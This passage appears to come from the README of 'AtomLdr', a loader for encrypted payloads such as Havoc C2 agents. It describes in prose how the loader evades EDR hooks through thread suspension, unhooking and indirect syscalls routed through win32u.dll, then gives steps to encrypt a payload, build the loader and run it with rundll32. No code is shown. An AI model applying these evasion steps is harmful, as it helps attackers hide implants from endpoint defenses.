This loader instead suspends the running threads, in an attempt to block any function from being called from within the targeted text sections, thus eliminating the need to mark them as RWX before unhooking and making RW permissions a possible choice.
This approach, however, created another problem: when unhooking, the NtProtectVirtualMemory syscall and others were using the syscall instruction inside the ntdll.dll module, as an indirect-syscall approach. Since the unhooked modules are now marked as RW sections, the syscall instruction we were jumping to can no longer be executed, so we had to jump to another executable location - this is where win32u.dll comes in.
win32u.dll contains syscalls for GUI-related functions, making it suitable to jump to instead of ntdll.dll. win32u.dll is loaded (statically) but not included in the unhooking routine, which ensures that win32u.dll can still execute the syscall instruction we are jumping to.
The suspended threads are then resumed.
It is worth mentioning that this approach may not be the most efficient and can be unstable due to the thread-suspension trick used. However, it has been tested against multiple processes with positive results. In the meantime, if you encounter any problems, feel free to open an issue.
Use PayloadBuilder.exe to encrypt your payload; this generates a PayloadConfig.pc file that contains the encrypted payload and its encrypted key and IV.
The generated PayloadConfig.pc file will then replace the one in the AtomLdr project.
Build the AtomLdr project as x64 Release.
Demos: running AtomLdr.dll using rundll32.exe, running a Havoc payload, and capturing a screenshot; AtomLdr.dll's Import Address Table; using PayloadBuilder.exe to encrypt demon[111].bin - a Havoc payload file; running AtomLdr.dll using rundll32.exe.